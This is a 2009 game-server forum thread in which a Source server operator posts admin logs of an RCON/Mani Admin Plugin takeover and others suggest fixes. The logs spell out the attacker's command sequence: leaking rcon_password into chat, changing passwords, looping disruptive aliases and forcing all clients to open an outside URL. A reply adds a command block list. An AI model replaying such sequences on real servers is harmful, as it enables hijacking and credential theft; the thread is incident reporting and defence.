AlliedModders
Page 1 of 5 1 23 Last »
Show 40 post(s) from this thread on one page

AlliedModders (https://forums.alliedmods.net/index.php)
-   Source Servers (SRCDS) (https://forums.alliedmods.net/forumdisplay.php?f=130)
-   -   New RCON exploit (https://forums.alliedmods.net/showthread.php?t=108215)

zeroibis 11-02-2009 19:53
New RCON exploit
 
Quote:
M 11/02/2009 - 16:58:43: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon log off

M 11/02/2009 - 16:58:43: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xset rcon 0

M 11/02/2009 - 16:58:43: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xcopy rcon rcon_password

M 11/02/2009 - 16:58:43: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xset player 0

M 11/02/2009 - 16:58:43: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xgetuserid player CaM

M 11/02/2009 - 16:58:43: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_tell server_var(player) #multi #green rcon_password is: #default server_var(rcon)
M 11/02/2009 - 16:59:11: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon log off

M 11/02/2009 - 16:59:11: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xset rcon 0

M 11/02/2009 - 16:59:11: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xcopy rcon rcon_password

M 11/02/2009 - 16:59:11: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xset player 0

M 11/02/2009 - 16:59:11: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xgetuserid player CaM

M 11/02/2009 - 16:59:11: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_tell server_var(player) #multi #green rcon_password is: #default server_var(rcon)
M 11/02/2009 - 16:59:35: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon toggle rcon_password balls
M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 8 "est_playplayer #A radio/roger.wav;es_delayed 0.1 8"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 23 "ma_rcon_Password penis313;es_Delayed 5 23"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 13 "est_effect 10 #a 0 sprites/lgtning.vmt -1150.552246 172.520111 6032.485352 50 220 0.4 10 50 0 255 0 0 200 0;es_delayed 0.1 13"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 12 "est_fade #A 15 999 0 0 0 255 80;es_delayed 0.1 12"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 11 "est_fade #A 15 999 0 0 255 0 80;es_delayed 0.1 11"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 10 "est_fade #A 15 999 0 255 0 0 80;es_delayed 0.1 10"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 9 "es_msg CaM Hacked The Server!!;es_delayed 0.1 9"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 7 "es_msg #lightgreen CaM Hacked The Server!!;es_delayed 0.1 7"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 6 "es_msg #green CaM Hacked The Server!!;es_delayed 0.1 6"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 52 "est_endround LOL 1;es_delayed 1 52"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 53 "est_shake #A 1 200 200;es_delayed 1 53"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 8

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 23

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 13

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 12

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 11

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 10

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 9

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 7

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 6

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 52

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 53
M 11/02/2009 - 17:00:51: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon sv_password 123
M 11/02/2009 - 17:01:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_cexec_all "ma_browse http://elenore.airinoff.com/cameron/"
M 11/02/2009 - 17:01:17: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_cexec_all "ma_browse http://elenore.airinoff.com/cameron/"
I am running latest SM ES MM 1.7.1 using RCON locker and kerigan anti cheat. I am running mani obviously and WCS.

Also replaced contents of clients.txt with his own data for two other steam accounts in addition to the one used for the hack.

CLIENT UPLOADED THERE OWN FILE to server!

thetwistedpanda 11-02-2009 19:59
Re: New RCON exploit
 
Kerigan's Anti Cheat? Someone's been playing a little Star Craft.

I tried to tell you this in steam chat zero, but there are quite a few Mani takeover scripts going around that do not require sv_cheats or rcon access; it's why I was recommending you rid your servers of it. That being said, this was one of those Mani takeover scripts. Sadly, the author of the script sells it for $15 a pop so they're becoming more and more prevalent. However, you should make sure you have the latest EventScripts version because that may be how your server was targeted (outdated ES has a few nice security holes). Aside from that, I can't stress enough that you get rid of Mani until it's completely fixed (which may never happen).

retsam 11-02-2009 20:07
Re: New RCON exploit
 
Mani = bad mkay? :)

thetwistedpanda 11-02-2009 20:08
Re: New RCON exploit
 
If you'd get on steam Zero, I'd like to discuss something with you.

zeroibis 11-02-2009 20:13
Re: New RCON exploit
 
Will do although it looks like random python files have been altered last night on the server and only on this server...

zeroibis 11-02-2009 20:16
Re: New RCON exploit
 
Yea, I plan to toss mani out as soon as vb4 comes out :D

devicenull 11-02-2009 20:38
Re: New RCON exploit
 
It's Mani. Remove it and you will be fine. This isn't new at all, a bit of searching would have revealed.. this

zeroibis 11-02-2009 20:45
Re: New RCON exploit
 
devicenull, please use your uber programing voodoo magic to fix this until VB4.0 comes out. I got to hold off until then becuase my sm and vbb databases are merged and the update could kill sourcebans and thus I am delaying the move until 4.0 is released any my plugin that links admins to vbb is shown to work without problem.

So until that can happen I need your uber mods to be updated to protect me! I can send you the souls of a thousand hackers for you to use in making the update if needed!

I tired using an es script called exploit to block ma_rcon but it returns: es_xflags: Could not find var or command: ma_rcon

so maybe it can be done is sm b/c es sux...

devicenull 11-02-2009 21:35
Re: New RCON exploit
 
It won't help.. the exploit relies on the changelevel command. For some reason mani fucks this up which means it can execute commands somehow. RCON lock attempts to block it, but depending how mani is installed, it may not.

In rcon lock, find this:
Code:
new String:cheat_flag[][] = { "dumpcountedstrings", "dbghist_dump", "dumpeventqueue", "dump_globals", "physics_select"
        , "physics_debug_entity", "dump_entity_sizes", "dumpentityfactories", "dump_terrain", "mp_dump_timers", "dumpcountedstrings"
        , "mem_dump", "soundscape_flush", "groundlist", "soundlist", "report_touchlinks", "report_entities", "physics_report_active"
        , "listmodels" };
Replace with:
Code:
new String:cheat_flag[][] = { "dumpcountedstrings", "dbghist_dump", "dumpeventqueue", "dump_globals", "physics_select"
        , "physics_debug_entity", "dump_entity_sizes", "dumpentityfactories", "dump_terrain", "mp_dump_timers", "dumpcountedstrings"
        , "mem_dump", "soundscape_flush", "groundlist", "soundlist", "report_touchlinks", "report_entities", "physics_report_active"
        , "listmodels", "changelevel","ma_rcon" };
This may or may not fix the issue you are seeing.

10000000 11-02-2009 23:45
Re: New RCON exploit
 
Disable rcon and create something similar using sourcemod


All times are GMT -4. The time now is 19:41.
Page 1 of 5 1 23 Last »
Show 40 post(s) from this thread on one page

Powered by vBulletin®
Copyright ©2000 - 2024, vBulletin Solutions, Inc.